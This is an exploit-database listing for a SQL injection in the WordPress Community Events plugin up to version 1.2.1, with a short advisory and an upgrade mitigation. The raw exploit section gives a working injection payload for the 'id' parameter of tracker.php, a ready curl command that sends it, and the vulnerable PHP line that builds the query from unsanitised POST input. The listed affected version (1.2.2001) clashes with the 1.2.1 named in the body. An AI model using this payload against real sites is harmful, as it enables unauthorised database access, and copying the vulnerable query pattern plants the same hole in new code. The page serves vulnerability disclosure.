header-logo
Suggest Exploit
vendor:
Community Events plugin
by:
Miroslav Stampar
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Community Events plugin
Affected Version From: 1.2.2001
Affected Version To: 1.2.2001
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

WordPress Community Events plugin <= 1.2.1 SQL Injection Vulnerability

The WordPress Community Events plugin version 1.2.1 is vulnerable to a SQL injection vulnerability. An attacker can exploit this vulnerability by sending a malicious POST request to the tracker.php file with a crafted 'id' parameter. This will allow the attacker to extract the version of the MySQL server running on the vulnerable system.

Mitigation:

Upgrade to the latest version of the WordPress Community Events plugin.
Source

Exploit-DB raw data:

# Exploit Title: WordPress Community Events plugin <= 1.2.1 SQL Injection Vulnerability
# Date: 2011-09-07
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/community-events.zip
# Version: 1.2.1 (tested)

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/community-events/tracker.php
 id=-1 AND EXTRACTVALUE(1, CONCAT(CHAR(58),@@version,CHAR(58)))--%20

e.g.:
curl --data "id=-1 AND EXTRACTVALUE(1, CONCAT(CHAR(58),@@version,CHAR(58)))-- " http://www.site.com/wp-content/plugins/community-events/tracker.php

---------------
Vulnerable code
---------------
$event_id = $_POST['id'];
...
$ceeventdataquery = "select * from " . $wpdb->get_blog_prefix() . "ce_events where event_id = " . $event_id;